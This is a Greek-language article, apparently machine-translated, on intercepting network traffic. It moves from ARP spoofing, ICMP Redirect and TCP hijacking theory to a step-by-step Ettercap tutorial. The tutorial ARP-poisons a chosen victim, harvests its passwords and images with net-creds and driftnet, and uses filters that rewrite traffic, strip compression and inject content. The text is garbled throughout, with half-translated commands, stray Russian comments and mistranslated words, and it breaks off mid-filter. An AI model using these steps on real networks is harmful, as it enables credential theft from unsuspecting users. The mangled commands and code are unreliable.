Σπίτι › Εγκατάσταση και ρύθμιση › Οι χάκερ χρησιμοποιούν για να ανακατευθύνουν την κυκλοφορία. Τρόποι επιθέσεων χάκερ. Παραπλάνηση δεδομένων με το Burp

Οι χάκερ χρησιμοποιούν για να ανακατευθύνουν την κυκλοφορία. Τρόποι επιθέσεων χάκερ. Παραπλάνηση δεδομένων με το Burp

Μέθοδοι υποκλοπής κίνησης δικτύου

Η ακρόαση του δικτύου με τη χρήση προγραμμάτων αναλυτών δικτύου είναι η πρώτη, η μεγαλύτερη με απλό τρόπουποκλοπή δεδομένων.

Για προστασία από την υποκλοπή δικτύου, εφαρμόστε ειδικά προγράμματα, για παράδειγμα, το AntiSniff, το οποίο είναι σε θέση να ανιχνεύσει υπολογιστές στο δίκτυο που ακούν την κίνηση του δικτύου.

Για να λύσουν τα προβλήματά τους, τα προγράμματα anti-sniffer χρησιμοποιούν μια ειδική ένδειξη της παρουσίας συσκευών ακρόασης στο δίκτυο - η κάρτα δικτύου του υπολογιστή sniffer πρέπει να βρίσκεται σε ειδική λειτουργία ακρόασης. Όταν βρίσκονται σε λειτουργία ακρόασης, οι δικτυωμένοι υπολογιστές ανταποκρίνονται με ειδικό τρόπο σε datagrams IP που αποστέλλονται στον υπό δοκιμή κεντρικό υπολογιστή. Για παράδειγμα, οι κεντρικοί υπολογιστές ακρόασης επεξεργάζονται συνήθως όλη την εισερχόμενη κίνηση, όχι μόνο τα γραφήματα δεδομένων που αποστέλλονται στη διεύθυνση κεντρικού υπολογιστή. Υπάρχουν άλλα σημάδια ύποπτης συμπεριφοράς κεντρικού υπολογιστή που μπορεί να αναγνωρίσει το AntiSniff.

Αναμφίβολα, η ακρόαση είναι πολύ χρήσιμη από την άποψη ενός εισβολέα, καθώς σας επιτρέπει να λαμβάνετε πολλές χρήσιμες πληροφορίες - κωδικούς πρόσβασης που μεταδίδονται μέσω του δικτύου, διευθύνσεις υπολογιστή δικτύου, εμπιστευτικά δεδομένα, γράμματα κ.λπ. Ωστόσο, η απλή υποκλοπή εμποδίζει έναν χάκερ να παρεμβαίνει στην επικοινωνία δικτύου μεταξύ δύο κεντρικών υπολογιστών για να τροποποιήσει και να καταστρέψει δεδομένα. Για να λυθεί αυτό το πρόβλημα, απαιτείται πιο εξελιγμένη τεχνολογία.

Ρύζι. 1 Ψεύτικα αιτήματα ARP

Ας δούμε πώς ένας χάκερ μπορεί να χρησιμοποιήσει το πρωτόκολλο ARP για να υποκλέψει την επικοινωνία δικτύου μεταξύ των κεντρικών υπολογιστών Α και Β.

Για να υποκλέψει την κυκλοφορία δικτύου μεταξύ των κεντρικών υπολογιστών Α και Β, ένας χάκερ εξαναγκάζει τη διεύθυνση IP του σε αυτούς τους κεντρικούς υπολογιστές, έτσι ώστε ο Α και ο Β να χρησιμοποιούν αυτήν την ψεύτικη διεύθυνση IP κατά την ανταλλαγή μηνυμάτων. Για να επιβάλει τη διεύθυνση IP του, ένας χάκερ εκτελεί τις ακόλουθες λειτουργίες.

Ένας εισβολέας καθορίζει τις διευθύνσεις MAC των κεντρικών υπολογιστών Α και Β, για παράδειγμα, χρησιμοποιώντας την εντολή nbtstat από το πακέτο W2RK.
Ο εισβολέας στέλνει μηνύματα στις αναγνωρισμένες διευθύνσεις MAC των κεντρικών υπολογιστών Α και Β, τα οποία είναι παραποιημένες απαντήσεις ARP σε αιτήματα επίλυσης των διευθύνσεων IP των κεντρικών υπολογιστών στις διευθύνσεις MAC των υπολογιστών. Ενημερώνεται στον κεντρικό υπολογιστή Α ότι η διεύθυνση IP του κεντρικού υπολογιστή Β ταιριάζει με τη διεύθυνση MAC του υπολογιστή του εισβολέα. Ο κεντρικός υπολογιστής Β ενημερώνεται ότι η διεύθυνση IP του κεντρικού υπολογιστή Α ταιριάζει επίσης με τη διεύθυνση MAC του υπολογιστή του εισβολέα.
Οι κεντρικοί υπολογιστές Α και Β εισάγουν τις ληφθείσες διευθύνσεις MAC στις κρυφές μνήμες ARP και στη συνέχεια τις χρησιμοποιούν για να στείλουν μηνύματα ο ένας στον άλλο. Δεδομένου ότι οι διευθύνσεις IP Α και Β αντιστοιχούν στη διεύθυνση MAC του υπολογιστή του εισβολέα, οι κεντρικοί υπολογιστές Α και Β, χωρίς να γνωρίζουν τίποτα, επικοινωνούν μέσω ενός ενδιάμεσου ικανού να κάνει ό,τι θέλουν με τα μηνύματά τους.

Σε δίκτυα UNIX, αυτό το είδος πλαστογράφησης επίθεσης ARP μπορεί να υλοποιηθεί χρησιμοποιώντας τα βοηθητικά προγράμματα παρακολούθησης και ελέγχου της κυκλοφορίας δικτύου του συστήματος, όπως το arpredirect. Δυστυχώς, τέτοια αξιόπιστα βοηθητικά προγράμματα δεν φαίνεται να εφαρμόζονται σε δίκτυα Windows. Για παράδειγμα, στον ιστότοπο NTsecurity, μπορείτε να κάνετε λήψη του βοηθητικού προγράμματος GrabitAII, το οποίο παρουσιάζεται ως εργαλείο για την ανακατεύθυνση της κυκλοφορίας μεταξύ των κεντρικών υπολογιστών δικτύου. Ωστόσο, ένας στοιχειώδης έλεγχος απόδοσης του βοηθητικού προγράμματος GrabitAII δείχνει ότι απέχει ακόμα πολύ από την πλήρη επιτυχία στην υλοποίηση των λειτουργιών του.

Για να υποκλέψει την κυκλοφορία δικτύου, ένας εισβολέας μπορεί να αντικαταστήσει την πραγματική διεύθυνση IP ενός δρομολογητή δικτύου με τη δική του διεύθυνση IP, για παράδειγμα, χρησιμοποιώντας πλαστά μηνύματα ICMP Redirect. Σύμφωνα με το RFC-1122, ο κεντρικός υπολογιστής Α πρέπει να ερμηνεύει το ληφθέν μήνυμα Ανακατεύθυνσης ως απόκριση σε ένα datagram που αποστέλλεται σε άλλο κεντρικό υπολογιστή, για παράδειγμα, Β. Ο κεντρικός υπολογιστής Α καθορίζει τις ενέργειές του στο μήνυμα Ανακατεύθυνσης με βάση τα περιεχόμενα του ληφθέντος μηνύματος Ανακατεύθυνσης και εάν η Redirect έχει ρυθμιστεί να ανακατευθύνει datagrams από το A στο B σε μια νέα διαδρομή, αυτό ακριβώς θα κάνει ο κεντρικός υπολογιστής A.

Ρύζι. 2 Εσφαλμένη δρομολόγηση

Για να πραγματοποιήσει ψεύτικη δρομολόγηση, ένας εισβολέας πρέπει να γνωρίζει ορισμένες λεπτομέρειες για τον οργανισμό τοπικό δίκτυο, όπου βρίσκεται ο κεντρικός υπολογιστής Α, συγκεκριμένα η διεύθυνση IP του δρομολογητή μέσω του οποίου η κίνηση αποστέλλεται από τον κεντρικό υπολογιστή Α στο Β. Γνωρίζοντας αυτό, ο εισβολέας θα σχηματίσει ένα datagram IP στο οποίο η διεύθυνση IP προέλευσης ορίζεται ως η διεύθυνση IP του ο δρομολογητής και ο παραλήπτης καθορίζεται κεντρικός υπολογιστής A. Στο datagram περιλαμβάνεται επίσης ένα μήνυμα ICMP Redirect με το πεδίο διεύθυνσης του νέου δρομολογητή να έχει οριστεί στη διεύθυνση IP του υπολογιστή του εισβολέα. Έχοντας λάβει ένα τέτοιο μήνυμα, ο κεντρικός υπολογιστής Α θα στείλει όλα τα μηνύματα στη διεύθυνση IP του υπολογιστή του εισβολέα.

Για να προστατευτείτε από μια τέτοια επίθεση, θα πρέπει να απενεργοποιήσετε (για παράδειγμα, χρησιμοποιώντας ένα τείχος προστασίας) στον κεντρικό υπολογιστή A την επεξεργασία των μηνυμάτων ICMP Redirect και η εντολή tracert (στο Unix αυτή είναι η εντολή tracerout) μπορεί να αποκαλύψει τη διεύθυνση IP του υπολογιστή του εισβολέα . Αυτά τα βοηθητικά προγράμματα μπορούν να βρουν μια πρόσθετη διαδρομή που εμφανίστηκε στο τοπικό δίκτυο, η οποία δεν προβλέπεται κατά την εγκατάσταση, εάν, φυσικά, ο διαχειριστής του δικτύου είναι προσεκτικός.

Τα παραπάνω παραδείγματα υποκλοπών (που κάθε άλλο παρά περιορίζονται στους εισβολείς) πείθουν για την ανάγκη προστασίας των δεδομένων που μεταδίδονται μέσω του δικτύου, εάν τα δεδομένα περιέχουν εμπιστευτικές πληροφορίες. Η μόνη μέθοδος προστασίας από υποκλοπές κυκλοφορίας δικτύου είναι η χρήση προγραμμάτων που εφαρμόζουν κρυπτογραφικούς αλγόριθμους και πρωτόκολλα κρυπτογράφησης και εμποδίζουν την αποκάλυψη και αντικατάσταση μυστικών πληροφοριών. Για την επίλυση τέτοιων προβλημάτων, η κρυπτογραφία παρέχει μέσα για την κρυπτογράφηση, την υπογραφή και τον έλεγχο ταυτότητας μηνυμάτων που μεταδίδονται μέσω ασφαλών πρωτοκόλλων.

Η πρακτική εφαρμογή όλων των μεθόδων κρυπτογράφησης για την προστασία της ανταλλαγής πληροφοριών παρέχεται από Δίκτυα VPN(Virtual Private Network - Virtual Private Networks).

Υποκλοπή σύνδεσης TCP

Η πιο εξελιγμένη επίθεση υποκλοπής κυκλοφορίας δικτύου θα πρέπει να θεωρείται ως πειρατεία σύνδεσης TCP (TCP hijacking), όταν ένας χάκερ, δημιουργώντας και στέλνοντας πακέτα TCP στον κεντρικό υπολογιστή που δέχεται επίθεση, διακόπτει την τρέχουσα συνεδρία επικοινωνίας με τον κεντρικό υπολογιστή. Περαιτέρω, χρησιμοποιώντας τις δυνατότητες του πρωτοκόλλου TCP για την επαναφορά μιας διακοπείσας σύνδεσης TCP, ο χάκερ παρεμποδίζει τη συνομιλία επικοινωνίας που έχει διακοπεί και τη συνεχίζει αντί για τον αποσυνδεδεμένο πελάτη.

Το TCP (Transmission Control Protocol) είναι ένα από τα βασικά πρωτόκολλα μεταφοράς. Στρώμα OSI, το οποίο σας επιτρέπει να δημιουργείτε λογικές συνδέσεις μέσω ενός εικονικού καναλιού επικοινωνίας. Τα πακέτα μεταδίδονται και λαμβάνονται μέσω αυτού του καναλιού με καταχώρηση της ακολουθίας τους, ελέγχεται η ροή των πακέτων, οργανώνεται η αναμετάδοση παραμορφωμένων πακέτων και στο τέλος της συνεδρίας διακόπτεται το κανάλι επικοινωνίας. Το TCP είναι το μόνο πρωτόκολλο βασικό πρωτόκολλοαπό την οικογένεια TCP/IP, η οποία διαθέτει προηγμένο σύστημα αναγνώρισης μηνυμάτων και σύνδεσης.

Επισκόπηση των Software Packet Sniffers

Όλα τα sniffer λογισμικού μπορούν να χωριστούν χονδρικά σε δύο κατηγορίες: sniffer που υποστηρίζουν εκκίνηση από γραμμή εντολών, και sniffers με γραφική διεπαφή. Παράλληλα, σημειώνουμε ότι υπάρχουν sniffer που συνδυάζουν και τα δύο αυτά χαρακτηριστικά. Επιπλέον, τα sniffer διαφέρουν μεταξύ τους ως προς τα πρωτόκολλα που υποστηρίζουν, το βάθος ανάλυσης των πακέτων που έχουν υποκλαπεί, τη δυνατότητα διαμόρφωσης φίλτρων και τη δυνατότητα συμβατότητας με άλλα προγράμματα.

Συνήθως το παράθυρο οποιουδήποτε sniffer με GUIαποτελείται από τρεις περιοχές. Το πρώτο εμφανίζει μια σύνοψη των πακέτων που έχουν συλληφθεί. Συνήθως, αυτή η περιοχή εμφανίζει ένα ελάχιστο πεδία, δηλαδή: χρόνος λήψης πακέτων. Διευθύνσεις IP του αποστολέα και του παραλήπτη του πακέτου. Διευθύνσεις MAC προέλευσης και προορισμού πακέτων, διευθύνσεις θύρας προέλευσης και προορισμού. τύπος πρωτοκόλλου (επίπεδο δικτύου, μεταφοράς ή εφαρμογής). ορισμένες συνοπτικές πληροφορίες σχετικά με τα υποκλαπέντα δεδομένα. Η δεύτερη περιοχή εμφανίζει στατιστικές πληροφορίες για το μεμονωμένο επιλεγμένο πακέτο και τέλος, η τρίτη περιοχή παρουσιάζει το πακέτο σε δεκαεξαδική μορφή ή μορφή χαρακτήρων - ASCII.

Σχεδόν όλα τα packet sniffer επιτρέπουν την ανάλυση των αποκωδικοποιημένων πακέτων (γι' αυτό και τα packet sniffers ονομάζονται επίσης packet analyters ή αναλυτές πρωτοκόλλου). Ο ανιχνευτής διανέμει τα υποκλαπέντα πακέτα κατά στρώματα και πρωτόκολλα. Ορισμένοι αναλυτές πακέτων είναι σε θέση να αναγνωρίσουν το πρωτόκολλο και να εμφανίσουν τις συλλεγόμενες πληροφορίες. Αυτός ο τύπος πληροφοριών εμφανίζεται συνήθως στη δεύτερη περιοχή του παραθύρου sniffer. Για παράδειγμα, κάθε sniffer μπορεί να αναγνωρίσει το πρωτόκολλο TCP και οι προηγμένοι sniffer μπορούν να καθορίσουν ποια εφαρμογή δημιούργησε αυτήν την κίνηση. Οι περισσότεροι αναλυτές πρωτοκόλλων αναγνωρίζουν πάνω από 500 διαφορετικά πρωτόκολλα και μπορούν να τα περιγράψουν και να τα αποκωδικοποιήσουν ονομαστικά. Όσο περισσότερες πληροφορίες μπορεί να αποκωδικοποιήσει και να παρουσιάσει ο sniffer στην οθόνη, τόσο λιγότερες πρέπει να αποκωδικοποιήσετε χειροκίνητα.

Ένα πρόβλημα που μπορεί να αντιμετωπίσουν οι ανιχνευτές πακέτων είναι ότι δεν μπορούν να αναγνωρίσουν σωστά ένα πρωτόκολλο χρησιμοποιώντας μια θύρα διαφορετική από την προεπιλεγμένη θύρα. Για παράδειγμα, προκειμένου να βελτιωθεί η ασφάλεια, ορισμένες γνωστές εφαρμογές ενδέχεται να ρυθμιστούν ώστε να χρησιμοποιούν θύρες διαφορετικές από τις προεπιλεγμένες θύρες. Έτσι, αντί για την παραδοσιακή θύρα 80 που είναι δεσμευμένη για τον διακομιστή web, δεδομένου διακομιστήμπορεί να αναγκαστεί να επαναδιαμορφώσει τις παραμέτρους στη θύρα 8088 ή σε οποιαδήποτε άλλη. Ορισμένοι αναλυτές πακέτων σε αυτήν την κατάσταση δεν μπορούν να προσδιορίσουν σωστά το πρωτόκολλο και να εμφανίσουν μόνο πληροφορίες σχετικά με το πρωτόκολλο χαμηλότερου επιπέδου (TCP ή UDP).

Υπάρχουν sniffers λογισμικού που συνοδεύονται από αναλυτικές μονάδες λογισμικού ως πρόσθετα ή ενσωματωμένες μονάδες που σας επιτρέπουν να δημιουργείτε αναφορές με χρήσιμες αναλυτικές πληροφορίες σχετικά με την υποκλαπόμενη κυκλοφορία.

Ένα άλλο χαρακτηριστικό γνώρισμα των περισσότερων sniffer πακέτων λογισμικού είναι η δυνατότητα διαμόρφωσης φίλτρων πριν και μετά την καταγραφή της κυκλοφορίας. Τα φίλτρα διαχωρίζουν ορισμένα πακέτα από τη γενική κίνηση σύμφωνα με ένα δεδομένο κριτήριο, το οποίο σας επιτρέπει να απαλλαγείτε από περιττές πληροφορίες κατά την ανάλυση της κυκλοφορίας.

Ettercap Alternatives

Το Ettercap είναι το πιο δημοφιλές πρόγραμμα επίθεσης man-in-the-middle, αλλά είναι το καλύτερο; Σε ολόκληρο το εγχειρίδιο, θα δείτε ότι το Ettercap δεν χρησιμοποιείται σχεδόν ποτέ μόνο του, ότι το ένα ή το άλλο πρόγραμμα συνοδεύεται πάντα από αυτό σε μια αλυσίδα επεξεργασίας κυκλοφορίας. Ίσως αυτό προσθέτει ευελιξία, γενικά, αυτή η προσέγγιση βρίσκεται στην καρδιά του UNIX - ένα πρόγραμμα εκτελεί μια εργασία και ο τελικός χρήστης συνδυάζει διάφορα προγράμματα για να επιτύχει το επιθυμητό αποτέλεσμα. Με αυτήν την προσέγγιση, ο κώδικας του προγράμματος είναι ευκολότερο να διατηρηθεί· τέτοια μικροσκοπικά "τούβλα" μπορούν να χρησιμοποιηθούν για την κατασκευή ενός συστήματος οποιασδήποτε πολυπλοκότητας και ευελιξίας. Ωστόσο, το να έχετε πέντε ανοιχτές κονσόλες με διαφορετικές εργασίες, η εργασία των οποίων τα προγράμματα στοχεύουν στην επίτευξη ενός μόνο αποτελέσματος, δεν είναι πολύ βολικό, είναι απλώς πιο δύσκολο, υπάρχει πιθανότητα να κάνετε λάθος σε κάποιο στάδιο και ολόκληρο το διαμορφωμένο σύστημα θα λειτουργήσει σε αδράνεια.

Net-Creds μυρίζει:

Διευθύνσεις URL επίσκεψης
απέστειλε αιτήματα POST
συνδέσεις/κωδικοί πρόσβασης από φόρμες HTTP
συνδέσεις/κωδικοί πρόσβασης για βασικό έλεγχο ταυτότητας HTTP
Αναζητήσεις HTTP
Συνδέσεις/κωδικοί πρόσβασης FTP
Συνδέσεις/κωδικοί πρόσβασης IRC
POP είσοδοι/κωδικοί πρόσβασης
Σύνδεση/κωδικοί πρόσβασης IMAP
Σύνδεση/κωδικοί πρόσβασης Telnet
Σύνδεση/κωδικοί πρόσβασης SMTP
Συμβολοσειρά κοινότητας SNMP
όλα τα υποστηριζόμενα πρωτόκολλα NTLMv1/v2 όπως HTTP, SMB, LDAP κ.λπ.
Kerberos

Μια καλή επιλογή υποκλαπόμενων εικόνων και το driftnet είναι απλούστερο από αυτή την άποψη - εμφανίζει μόνο εικόνες που έχουν υποκλαπεί.

Θέστε το μηχάνημά σας σε λειτουργία προώθησης.

echo "1" > /proc/sys/net/ipv4/ip_forward

Εκτελέστε το Ettercap με GUI (-G ):

Ettercap-G

Τώρα επιλέξτε Hosts , στο υποστοιχείο Scan for hosts . Αφού ολοκληρωθεί η σάρωση, επιλέξτε Λίστα κεντρικών υπολογιστών:

Ως Target1, επιλέξτε το router (Add to Target 1 ), ως Target2, επιλέξτε τη συσκευή στην οποία θα επιτεθείτε (Add to Target 2 ).

Αλλά εδώ μπορεί να προκύψει το πρώτο πρόβλημα, ειδικά αν υπάρχουν πολλοί οικοδεσπότες. Σε διάφορες οδηγίες, συμπεριλαμβανομένου του βίντεο που παρουσιάστηκε παραπάνω, οι συγγραφείς ανεβαίνουν στο μηχάνημα προορισμού (για κάποιο λόγο, όλοι έχουν Windows εκεί) και χρησιμοποιούν την εντολή για να εξετάσουν την IP αυτού του μηχανήματος στο τοπικό δίκτυο. Συμφωνώ, αυτή η επιλογή είναι απαράδεκτη για πραγματικές συνθήκες.

Εάν κάνετε σάρωση με , τότε μπορείτε να λάβετε μερικά Επιπλέον πληροφορίεςσχετικά με τους κεντρικούς υπολογιστές, πιο συγκεκριμένα, σχετικά με τον κατασκευαστή της κάρτας δικτύου:

nmap -sn 192.168.1.0/24

Εάν τα δεδομένα εξακολουθούν να μην είναι αρκετά, τότε μπορείτε να κάνετε μια σάρωση με τον ορισμό του λειτουργικού συστήματος:

nmap -O 192.168.1.0/24

Όπως μπορείτε να δείτε, το μηχάνημα με IP 192.168.1.33 αποδείχθηκε ότι είναι Windows, αν αυτό δεν είναι σημάδι από πάνω, τότε τι είναι; 😉 lol

Αυτό προσθέτουμε ως δεύτερο στόχο.

Τώρα μεταβείτε στο στοιχείο μενού Mitm. Εκεί επιλέξτε ARP Poisoning... Επιλέξτε το πλαίσιο ελέγχου Sniff remote connections.

Ξεκινάμε τη συγκομιδή, σε ένα παράθυρο εκτοξεύουμε

Καθαρές πιστώσεις

σε άλλο (και τα δύο προγράμματα μπορούν να εκτελεστούν χωρίς επιλογές)

παρασυρόμενο δίχτυ

Η συλλογή δεδομένων ξεκίνησε αμέσως.

Στη δεξιά πλευρά, το driftnet άνοιξε ένα άλλο παράθυρο που εμφανίζει τραβηγμένες εικόνες. Στο παράθυρο net-creds, βλέπουμε ιστότοπους που έχουν επισκεφτεί και υποκλαπείς κωδικούς πρόσβασης:

1.2 Σουίτα Ettercap + Burp
3. Προβολή δεδομένων (ιστοσελίδες που επισκέφθηκαν και καταγράψατε κωδικοί πρόσβασης) στο Ettercap

Στο μενού Προβολή, οι καρτέλες Συνδέσεις και Προφίλ είναι διαθέσιμες σε εμάς. Μπορείτε επίσης να επιλέξετε το πλαίσιο Επίλυση διευθύνσεων IP. Οι συνδέσεις είναι, φυσικά, συνδέσεις. Το Ettercap συλλέγει προφίλ στη μνήμη για κάθε κεντρικό υπολογιστή που ανακαλύπτει. Οι χρήστες και οι κωδικοί πρόσβασης συλλέγονται εκεί. Σε αυτήν την περίπτωση, τα προφίλ με καταγεγραμμένα δεδομένα λογαριασμού (κωδικοί πρόσβασης) επισημαίνονται με ένα σταυρό:

Μην βασίζεστε υπερβολικά στα προφίλ - για παράδειγμα, επισημαίνονται υποκλοπές σύνδεσης και κωδικοί πρόσβασης για FTP και άλλες υπηρεσίες, για τις οποίες το πρόγραμμα μπορεί να ερμηνεύσει αναμφίβολα τις πληροφορίες που λαμβάνονται ως διαπιστευτήρια. Αυτό δεν περιλαμβάνει, για παράδειγμα, βασικά δεδομένα ελέγχου ταυτότητας, εισαγόμενα στοιχεία σύνδεσης και κωδικούς πρόσβασης σε φόρμες ιστού.

Στις Συνδέσεις, τα πιο πολλά υποσχόμενα δεδομένα επισημαίνονται με έναν αστερίσκο:

Μπορείτε να κάνετε διπλό κλικ σε αυτές τις καταχωρήσεις για να δείτε τις λεπτομέρειες:

Για να μην αναζητήσετε αυτά τα αστέρια σε ολόκληρη τη λίστα, μπορείτε να τα ταξινομήσετε με βάση αυτό το πεδίο και θα βρίσκονται όλα στην κορυφή ή στο κάτω μέρος:

Βασικός έλεγχος ταυτότητας:

Σύνδεση-κωδικός πρόσβασης για Yandex (επισημαίνεται παρακάτω):

Αυτά είναι τα υποκλαπέντα διαπιστευτήρια για το Vkontakte:

Επίσης, τα πιο ενδιαφέροντα δεδομένα συλλέγονται στην κάτω κονσόλα:

Εάν θέλετε να αποθηκεύσετε τα αποτελέσματα του προγράμματος, χρησιμοποιήστε αυτές τις επιλογές (καθορίστε τα πλήκτρα κατά την εκκίνηση του Ettercap:

Επιλογές καταγραφής: -w, --write εγγραφή καταγεγραμμένων δεδομένων στο pcapfile -L, --log εγγραφή όλης της κυκλοφορίας σε αυτό -l, --log-info εγγραφή μόνο παθητικής πληροφορίας σε αυτό -m, --log-msg εγγραφή όλων των μηνυμάτων σε αυτό το -c, --compress χρησιμοποιήστε συμπίεση gzip για αρχεία καταγραφής

4. Αντικατάσταση δεδομένων εν κινήσει στο Ettercap
4.1 Χρήση προσαρμοσμένων φίλτρων Ettercap

Σημείωση: Σε όλες τις δοκιμές μου, τα φίλτρα Ettercap δεν λειτουργούσαν. Είναι δύσκολο να καταλάβει κανείς αν είναι στα χέρια, στις δυνατότητες υλικού ή σε σφάλμα στο ίδιο το πρόγραμμα... Αλλά για την έκδοση 0.8.2 (η πιο πρόσφατη αυτή τη στιγμή), υπάρχει μια αναφορά σφαλμάτων σχετικά με προβλήματα με τα φίλτρα. Γενικά, αν κρίνουμε από τις αναφορές σφαλμάτων και τα φόρουμ, τα φίλτρα είτε πέφτουν συχνά, είτε δεν λειτουργούν καθόλου για μεγάλο χρονικό διάστημα. Υπάρχει ένας κλάδος που τροποποιήθηκε πριν από 5 μήνες https://github.com/Ettercap/ettercap/tree/filter-improvements, π.χ. φίλτρα-βελτιώσεις (με βελτιώσεις φίλτρων). Έγινε μια μεγάλη ποικιλία δοκιμών για αυτόν τον κλάδο και για την έκδοση από το αποθετήριο, δοκιμάστηκαν διάφορα φίλτρα σε διαφορετικές συνθήκες, δαπανήθηκε πολύς χρόνος, αλλά δεν υπήρξε αποτέλεσμα. Παρεμπιπτόντως, για να εγκαταστήσετε την έκδοση των βελτιώσεων φίλτρων στο Kali Linux, πρέπει να κάνετε αυτό:

sudo apt-get αφαιρέστε ettercap-γραφικό ettercap-κοινό sudo apt-get εγκατάσταση git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5 libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git κλώνος -b φίλτρο-βελτιώσεις https://github.com/Ettercap/ettercap.git cd ettercap/ mkdirLECSF Buildd =On ../ make sudo make install

Γενικά, αν τα φίλτρα σας δεν λειτουργούν, τότε δεν είστε μόνοι. Στις οδηγίες για το Ettercap, δεν μπορώ να παραλείψω το θέμα των φίλτρων, επομένως θα ληφθούν υπόψη ούτως ή άλλως.

Μέχρι στιγμής χρησιμοποιούσαμε το Ettercap για πλαστογράφηση ARP. Αυτή είναι μια πολύ επιφανειακή εφαρμογή. Χάρη στα προσαρμοσμένα φίλτρα, μπορούμε να επέμβουμε και να αλλάξουμε την κυκλοφορία εν κινήσει. Τα φίλτρα πρέπει να περιέχονται σε ξεχωριστά αρχεία και πρέπει να έχουν μεταγλωττιστεί με το πρόγραμμα Etterfilter πριν από τη χρήση. Αν και η τεκμηρίωση στην οποία δίνεται ο σύνδεσμος φαίνεται να είναι σύντομη, αλλά σε συνδυασμό με τα παρακάτω παραδείγματα, θα σας επιτρέψει να γράψετε αρκετά ενδιαφέροντα φίλτρα.

Ας δημιουργήσουμε το πρώτο μας φίλτρο, θα αντικαταστήσει όλες τις εικόνες με αυτό:

Σε ένα αρχείο με το όνομα img_replacer.filter, αντιγράψτε:

If (ip.proto == TCP && tcp.dst == 80) ( if (αναζήτηση(DATA.data, "Accept-Encoding")) ( αντικατάσταση ("Accept-Encoding", "Accept-Rubbish!"); # Σημείωση: η συμβολοσειρά αντικατάστασης έχει το ίδιο μήκος με το αρχικό msg("Zappped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( αντικατάσταση("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); αντικατάσταση("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Εκτέλεση φίλτρου.\n"); )

Μεταγλώττιση του αρχείου:

Etterfilter img_replacer.filter -o img_replacer.ef

Αποτελέσματα συλλογής:

Etterfilter 0.8.2 πνευματικά δικαιώματα 2001-2015 Ettercap Development Team Φορτώθηκαν 14 πίνακες πρωτοκόλλου: ΑΠΟΚΩΔΙΚΟΠΟΙΗΜΕΝΑ ΔΕΔΟΜΕΝΑ udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth Φορτώθηκαν 13 σταθερές: VRRP OSPF GRE UDPPMP6 Πηγή ΑΠΟΚΩΔΙΚΟΠΟΙΗΜΕΝΩΝ IPPOTPIC αρχείο Ολοκληρώθηκε το "img_replacer.filter". Το ξεδίπλωμα του μετα-δέντρου έγινε. Έγινε η μετατροπή των ετικετών σε πραγματικές μετατοπίσεις. Η εγγραφή εξόδου στο "img_replacer.ef" ολοκληρώθηκε. -> Σενάριο κωδικοποιημένο σε 18 οδηγίες.

Ο διακόπτης -F λέει στο πρόγραμμα να φορτώσει το φίλτρο από το αρχείο που ακολουθεί τον διακόπτη. Μετά τη μεταγλώττιση, το όνομα του νέου μας αρχείου με το φίλτρο είναι img_replacer.ef, οπότε η εντολή γίνεται:

Ettercap -G -F img_replacer.ef

Σημείωση: Όταν παρακολουθείτε την κυκλοφορία ιστού, τα πακέτα που βλέπετε μπορεί να είναι σε κρυπτογραφημένη μορφή. Για αποτελεσματική εργασίαφίλτρα, το Ettercap χρειάζεται κίνηση στη φόρμα απλό κείμενο. Σύμφωνα με ορισμένες παρατηρήσεις, ο τύπος κωδικοποίησης που χρησιμοποιούν οι ιστοσελίδες είναι "Accept-Encoding: gzip, deflate"

Παρακάτω είναι ένα φίλτρο που αντικαθιστά την κωδικοποίηση, επιβάλλοντας την επικοινωνία με τη μορφή απλού κειμένου:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) (place("gzip", " "); # note: τέσσερα κενά στη συμβολοσειρά μηνυμάτων σε αντικατάσταση ("whited out gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) (if (αναζήτηση(DATA.data, "deflate")) (αντικατάσταση("deflate", " "); # σημείωση: επτά κενά στη συμβολοσειρά αντικατάστασης msg("whited out deflate\n"); ) )

Η σύνταξη για τη σύνταξη φίλτρων περιγράφεται λεπτομερώς και, στη συνέχεια, μερικά ακόμη παραδείγματα:

# αντικατάσταση κειμένου στο πακέτο: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter ran"); ) # show message αν η θύρα tcp είναι 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # καταγραφή όλης της κυκλοφορίας telnet , εκτελέστε επίσης ./πρόγραμμα ανά πακέτο εάν (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile.log ") ; exec ("./program"); "./logfile.log"); ) # ορισμένες λειτουργίες ωφέλιμου φορτίου πακέτων εάν (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = "τροποποιήθηκε"; DATA .data + 20 = 0x4445; ) # drop όλα τα πακέτα που περιέχουν "ettercap" if (search(DECODED.data, "ettercap")) ( msg("κάποιος μιλάει για εμάς...\n"); drop( ); kill( ); ) # write αποκρυπτογραφημένα πακέτα ssh που ταιριάζουν με το regex if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # killing packets if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed 